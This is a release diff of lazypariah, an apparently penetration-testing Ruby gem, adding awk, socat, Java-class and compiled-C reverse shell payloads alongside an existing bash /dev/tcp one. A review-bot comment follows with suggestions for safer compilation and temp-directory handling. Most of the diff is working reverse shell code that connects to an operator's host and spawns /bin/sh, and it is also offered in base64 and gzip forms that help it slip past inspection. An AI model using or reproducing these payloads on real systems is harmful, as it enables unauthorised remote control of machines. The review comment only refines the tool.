lazypariah 0.2.0 → 0.3.0
- checksums.yaml +4 -4
- data/bin/lazypariah +84 -3
- metadata +4 -3
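--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz:
-data.tar.gz:
+metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
+data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
 SHA512:
-metadata.gz:
-data.tar.gz:
+metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
+data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532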
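--- a/data/bin/lazypariah
+++ b/data/bin/lazypariah
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
 # Title: LAZYPARIAH
-# Version: 0.
+# Version: 0.3.0
 # Description:
 # LAZYPARIAH is a simple tool for generating various reverse shell payloads
 # on the fly. It is intended to be used only in authorised circumstances by
@@ -24,10 +24,12 @@
 require "base64"
 require "optparse"
 require "erb"
+require "zlib"
+require "stringio"
 
 # Define constants.
 PROGRAM_NAME = "LAZYPARIAH".freeze()
-PROGRAM_VERSION = "0.
+PROGRAM_VERSION = "0.3.0".freeze()
 EXECUTABLE_NAME = "lazypariah".freeze()
 
 # Define payload list.
@@ -58,7 +60,16 @@ PAYLOAD_LIST = [
 "ruby",
 "ruby_c",
 "ruby_b64",
-"bash_tcp"
+"bash_tcp",
+"awk",
+"socat",
+"java_class_binary",
+"java_class_b64",
+"java_class_gzip_b64",
+"c_binary",
+"c_binary_b64",
+"c_binary_gzip",
+"c_binary_gzip_b64"
 ].sort()
 
 # Define function for displaying program information.
@@ -202,6 +213,76 @@ begin
 print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
 when "bash_tcp"
 print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
+when "awk"
+print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
+when "socat"
+print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
+when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
+code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.java"
+
+system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
+
+File.open(temp_dir+"/rs.class", "r") do |f|
+java_payload = f.read()
+case ARGV[0]
+when "java_class_binary"
+print_output(java_payload)
+when "java_class_b64"
+java_payload_b64 = Base64.strict_encode64(java_payload)
+print_output(java_payload_b64, url_encode=url_encode)
+when "java_class_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(java_payload)
+gz.close()
+java_payload_gzip = sio.string
+java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
+print_output(java_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
+when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
+code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
+
+temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
+temp_file = temp_dir+"/rs.c"
+
+system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
+
+File.open(temp_dir+"/rs", "r") do |f|
+binary_payload = f.read()
+case ARGV[0]
+when "c_binary"
+print_output(binary_payload)
+when "c_binary_b64"
+binary_payload_b64 = Base64.strict_encode64(binary_payload)
+print_output(binary_payload_b64)
+when "c_binary_gzip"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+print_output(binary_payload_gzip, url_encode)
+when "c_binary_gzip_b64"
+sio = StringIO.new()
+sio.binmode()
+gz = Zlib::GzipWriter.new(sio)
+gz.write(binary_payload)
+gz.close()
+binary_payload_gzip = sio.string
+binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
+print_output(binary_payload_gzip_b64, url_encode=url_encode)
+end
+end
+
+system("rm -r #{temp_dir}")
 end
 end
 end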
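Review bot: The compile steps at new lines 226 and 255 hand the ARGV-derived source to the shell through `echo '…' > …` and ignore the return value of `system`, so a missing or failing javac/gcc leaves no artifact, the following `File.open` raises Errno::ENOENT, and the `rm -r` at 248/285 is skipped (unless the `begin` that opens before this hunk rescues it); the `temp_dir` read from `IO.popen("mktemp …")` is likewise interpolated unquoted and is an empty string when mktemp fails. Writing the source with `File.write`, invoking the compiler through the multi-argument form `system("javac", temp_file)` and checking its result, and letting `Dir.mktmpdir` (`require "tmpdir"`) own the directory removes the shell round-trips and guarantees cleanup, while `File.binread` keeps the .class/ELF bytes as a binary string instead of tagging them with the default text encoding. Separately, the `print_output` calls for `socat`, `java_class_binary` and `c_binary_b64` omit the url_encode argument their neighbours pass, and `c_binary_gzip` passes `url_encode` bare while the others write `url_encode=url_encode` — which in a Ruby call is a local assignment passed positionally, not a keyword argument; `print_output` is defined outside this hunk so I cannot confirm its signature, but the asymmetry looks unintended. The same rewrite applies to the C branch at 249–285.
```ruby
when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
  # … unchanged: Java source assigned to `code` …
  Dir.mktmpdir("lazypariah_") do |temp_dir|
    temp_file = File.join(temp_dir, "rs.java")
    File.write(temp_file, code)
    raise "javac failed for #{temp_file}" unless system("javac", temp_file)
    java_payload = File.binread(File.join(temp_dir, "rs.class"))
    # … unchanged: case ARGV[0] dispatch over java_payload …
  end
  # the trailing system("rm -r …") is no longer needed; mktmpdir removes the directory
```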
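--- a/metadata
+++ b/metadata
@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: lazypariah
 version: !ruby/object:Gem::Version
-version: 0.
+version: 0.3.0
 platform: ruby
 authors:
 - Peter Funnell
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2020-11-
+date: 2020-11-23 00:00:00.000000000 Z
 dependencies: []
 description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
 on the fly. It is intended to be used only in authorised circumstances by qualified
@@ -42,7 +42,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
 - !ruby/object:Gem::Version
 version: '0'
 requirements:
-- A GNU/Linux or BSD operating system.
+- A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
+and OpenJDK (for Java payloads).
 rubygems_version: 3.1.2
 signing_key:
 specification_version: 4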